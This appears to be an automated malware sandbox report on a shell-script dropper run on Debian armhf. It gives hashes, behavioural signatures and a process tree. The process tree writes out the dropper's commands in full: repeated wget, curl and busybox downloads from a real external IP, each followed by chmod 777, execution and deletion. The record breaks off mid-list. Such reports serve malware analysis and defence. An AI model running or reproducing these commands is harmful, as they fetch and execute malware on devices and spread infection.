Analysis
-
max time kernel
59s -
max time network
73s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:28
Static task
static1
Behavioral task
behavioral1
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral4
Sample
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh
-
Size
10KB
-
MD5
ba972d8a71d4f6e168a2e85fed85abb5
-
SHA1
d5a1c90cb3a5c93711516ffd0a1b453f2dab2d34
-
SHA256
84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478
-
SHA512
9fedd59c9f5bba18e74051cda67828dcb72dd743e458801140e60e8820799de56e08cace0c1124ed1a4904a107367fea85941e62b1809200b6e7649abc0d43fb
-
SSDEEP
192:cyCVKOtLWhe6/TSK9QQx0YDcUO1NDc9Be6/TSKrQQx0EyCVKOb:iLWtVQQx0YDcUUNDc/DQQx0U
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 25 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 794 chmod 800 chmod 835 chmod 869 chmod 887 chmod 893 chmod 747 chmod 770 chmod 849 chmod 855 chmod 861 chmod 875 chmod 716 chmod 829 chmod 905 chmod 913 chmod 807 chmod 734 chmod 788 chmod 817 chmod 823 chmod 841 chmod 881 chmod 899 chmod 688 chmod -
Executes dropped EXE 25 IoCs
ioc pid Process /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 690 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw 719 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ 736 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q 749 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 772 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 789 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 795 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 801 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 808 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 818 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 824 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 830 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 836 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 842 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW 850 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq 856 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh 862 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 870 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P 876 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT 882 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR 888 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t 894 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 900 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK 906 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt 914 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt -
Checks CPU configuration 1 TTPs 25 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 898 busybox 901 rm 751 wget 755 curl 767 busybox 772 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG 773 rm 897 curl 896 wget 900 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG -
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt curl File opened for modification /tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG curl File opened for modification /tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw curl File opened for modification /tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq curl File opened for modification /tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT curl File opened for modification /tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR curl File opened for modification /tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q curl File opened for modification /tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK curl File opened for modification /tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW curl File opened for modification /tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t curl File opened for modification /tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4 curl
Processes
-
/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh/tmp/84b6d18fcbcdc01baf1474afb704de9dca24cb6759ec0110b085a70528b95478.sh1⤵PID:648
-
/bin/rm/bin/rm bins.sh2⤵PID:650
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:654
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:664
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:673
-
-
/bin/chmodchmod 777 I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- File and Directory Permissions Modification
PID:688
-
-
/tmp/I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt./I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵
- Executes dropped EXE
PID:690
-
-
/bin/rmrm I7TbY7V53K937e05Mu6IWw6Kv6GOvtVHQt2⤵PID:691
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:692
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:710
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:714
-
-
/bin/chmodchmod 777 VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- File and Directory Permissions Modification
PID:716
-
-
/tmp/VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw./VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵
- Executes dropped EXE
PID:719
-
-
/bin/rmrm VZ0hOZrgVNjhwbXkbz0geABA2vZ08f7HIw2⤵PID:720
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:722
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:724
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:730
-
-
/bin/chmodchmod 777 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- File and Directory Permissions Modification
PID:734
-
-
/tmp/3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ./3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵
- Executes dropped EXE
PID:736
-
-
/bin/rmrm 3fv7Vle69q9yixRAqLeQtsoqoxgHkgkrmJ2⤵PID:737
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:739
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:741
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:743
-
-
/bin/chmodchmod 777 zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- File and Directory Permissions Modification
PID:747
-
-
/tmp/zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q./zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm zkj23Fy6pGkh4j6jdlqbHKzMnIzfhOtH3q2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:751
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:767
-
-
/bin/chmodchmod 777 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- File and Directory Permissions Modification
PID:770
-
-
/tmp/6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG./6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:772
-
-
/bin/rmrm 6iKoGcwDACVmOz0vvPTTz5BtbYipmzvioG2⤵
- System Network Configuration Discovery
PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:775
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:778
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:785
-
-
/bin/chmodchmod 777 nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- File and Directory Permissions Modification
PID:788
-
-
/tmp/nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK./nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵
- Executes dropped EXE
PID:789
-
-
/bin/rmrm nTjm6Q4cvFLykvLJpEc4TdkfeiUTopqmrK2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:793
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:796
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:797
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:798
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:799
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:802
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:803
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:804
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:805
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:807
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:808
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:809
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:810
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:813
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:818
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:819
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:820
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:821
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:822
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:823
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:824
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:826
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:827
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:828
-
-
/bin/chmodchmod 777 U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- File and Directory Permissions Modification
PID:829
-
-
/tmp/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT./U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵
- Executes dropped EXE
PID:830
-
-
/bin/rmrm U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:831
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:832
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:833
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:834
-
-
/bin/chmodchmod 777 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR./7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 7XWKfw2nsYQyAosiOCq6cG37EfOpaMm7bR2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:840
-
-
/bin/chmodchmod 777 YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t./YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm YB8tSIr0seXjOtZguo42S0WDDS7FpM7u9t2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:848
-
-
/bin/chmodchmod 777 UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW./UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm UG8hGoJxZXibBOgG5tzpmDJiZeuppp8vXW2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:854
-
-
/bin/chmodchmod 777 MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq./MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm MqjaFNe8nA2lEZcSNULRyhaZug152p0jlq2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:860
-
-
/bin/chmodchmod 777 WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh./WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm WT7f69tXrSlGsLjRLas8jJhieot4Zev2uh2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:866
-
-
/bin/chmodchmod 777 Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- File and Directory Permissions Modification
PID:869
-
-
/tmp/Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb4./Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵
- Executes dropped EXE
PID:870
-
-
/bin/rmrm Ydyr6kMuSs0OpHG6nA7bnr63Vc9GiRMIb42⤵PID:871
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:872
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:873
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:874
-
-
/bin/chmodchmod 777 luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- File and Directory Permissions Modification
PID:875
-
-
/tmp/luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P./luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵
- Executes dropped EXE
PID:876
-
-
/bin/rmrm luXoxoOQiAbigJM2JJnFQCSJlkFeRHgH1P2⤵PID:877
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/U5zYVB93pcrpWFS8dCqiKpqrNYLLK4LAxT2⤵PID:878
-
